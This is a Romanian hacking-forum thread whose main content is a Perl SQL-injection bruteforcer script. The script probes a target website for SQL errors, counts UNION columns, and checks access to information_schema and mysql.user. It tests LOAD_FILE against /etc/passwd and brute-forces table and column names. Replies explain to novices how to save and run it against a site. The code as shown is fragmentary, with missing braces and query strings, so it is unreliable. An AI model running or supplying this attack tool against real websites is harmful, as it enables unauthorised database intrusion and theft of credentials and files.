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SQL Injection bruteforcer

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#!/usr/bin/perluse LWP::Simple;
print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";
print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";
exit (0);
@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
if ( $ARGV[0] !~ /^http:/ )
$ARGV[0] = "http://" . $ARGV[0];
if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")
$cmn.= "+";
print "\n[+] Comments to use: '--' & '+'";
$cmn.= "/**/";
$cfin.= "/*";
print "\n[+] Comments to use: '/*' & '/**/'";
open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";
if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")
print "\n[!] Skipping the initial check...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
print "\n[!] Checking if the website is vulnerable...\n";
$response=get($sql)or die("[-] Wrong Website, check it\n");
if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/)
print "[+] Vulnerable website, script continues...\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";
print "\n[!] Looking up columns...\n";
for ($column = 0 ; $column < $ARGV[1] ; $column ++)
if ($column == 0)
print WEB "\n[COLUMNS]:\n\n";
$inyection = '';
$union = '';
$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");
if($response =~ /loginpwnz/)
$column ++;
print "[+] The site has $column columns\n\n";
print "$sql\n";
print WEB "$sql\n";
print "\n[!] Checking if Information_Schema exists...";
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
print "\n[+] Information_Schema available...saving in $ARGV[2]";
print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
print "\n[-] Information_Schema unavailable";
print "\n[!] Checking if MySQL.User exists...";
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
print "\n[+] MySQL.User available...saving in $ARGV[2]";
print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
print "\n[-] MySQL.User unavailable";
while ($loadcont < $column-1)
print "\n[!] Checking if it is possible to inject LOAD_FILE...";
$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");
if($response =~ /root:x:/)
print "\n[+] LOAD_FILE available...saving in $ARGV[2]";
print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
print "\n[-] LOAD_FILE unavailable";
if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")
print "\n\n[!] Brute forcing tables...";
print WEB "\n\n[TABLES]:\n\n";
foreach $tabla(@nombretabla)
$response=get($sql)or die("[-] Impossible to get tables\n");
if($response =~ /loginpwnz/)
print "\n[+] Table $tabla exists...saving in $ARGV[2]";
print WEB "$sql\n";
if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")
print "\n\n[!] Table to brute force columns: ";
print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";
foreach $columna(@nombrecolumna)
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
print "\n[+] Column $columna available...saving in $ARGV[2]";
print WEB "$columna\n";
print WEB "\n\n\n[*EOF*]";
print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";
print "## c0ded by Bl4k3 | 2010 ##\n\n";
exit (0);
print "[-] Impossible to find number of columns, try more columns\n\n";
print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";
exit (0);

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m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

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m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

Nu pot sa fac o prezentare a fiecarui program pe care il postez, timp pierdut.

- SQL injection

- Brute Force Attack

Nu o sa iti explice nimeni nimic ca la clasa I, rar gasesti persoane care sa aiba rabdare cu tine si timp. Daca vrei sa inveti, inveti singur.

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Guest Kovalski

este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care

[+] SQL Injection bruteforce By Bl4k3 -[+]-


Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]

[WEBSITE]: Website Design | Small Business Web Design | Web.com

[COLUMNS]: Limit of columns to check

[FILE]: File where save the results

[COMMENT]: '/*' o '--' (Without '') (Optional)

[-T]: Try to brute force tables (Optional)

[-C]: Try to brute force columns (Optional)

[-NOCHECK]: Skip the initial check (Optional)

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cunosc cei doi termeni,dar cum se foloseste codul?

Creezi un fi?ier .pl, ?i îl rulezi prin „perl script.pl”. Argumentele ?i le afi?eaz? el.

$ perl plm.pl hxxp://exemplu.ro/index.php?id= 20 res.txt -- -T -C

[+] Comments to use: '--' & '+'
[!] Checking if the website is vulnerable...
Undefined subroutine &main::get called at plm.pl line 61.

Linia 61 nu-mi zice nimic.

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este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care

[+] SQL Injection bruteforce By Bl4k3 -[+]-


Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]

[WEBSITE]: Website Design | Small Business Web Design | Web.com

[COLUMNS]: Limit of columns to check

[FILE]: File where save the results

[COMMENT]: '/*' o '--' (Without '') (Optional)

[-T]: Try to brute force tables (Optional)

[-C]: Try to brute force columns (Optional)

[-NOCHECK]: Skip the initial check (Optional)

am inteles totul...

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cunosc cei doi termeni,dar cum se foloseste codul?

Mini-tutorial Perl/Tk

@ps-axl, imagineaza-ti ca scriptul de sus e primul script in perl pe care il vezi, e prima data cand auzi de perl.

Citeste ce ai scris tu:

este un script de perl.

copii acel cod dai vi exemplu.pl

apesi i

dai paste la acest cod

apesi ESC

dai :wq

dupa care


Intelegi ceva?

Edited by ZeroCold
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m-as bucura si eu daca s-ar descrie mai mult scripturile / programele care se posteaza.... Nu toti avem cunostinte avansate si credc ca ar fi frumos, ca si noi cei mai noi sa intelegem toate astea :D Va rog nu o luati in nume de rau si veniti cu afirmatii de genu : Testu cu broasca, Test la inregistrare Multumesc

As requested: [Perl] sqli_brute.pl - Pastebin.com

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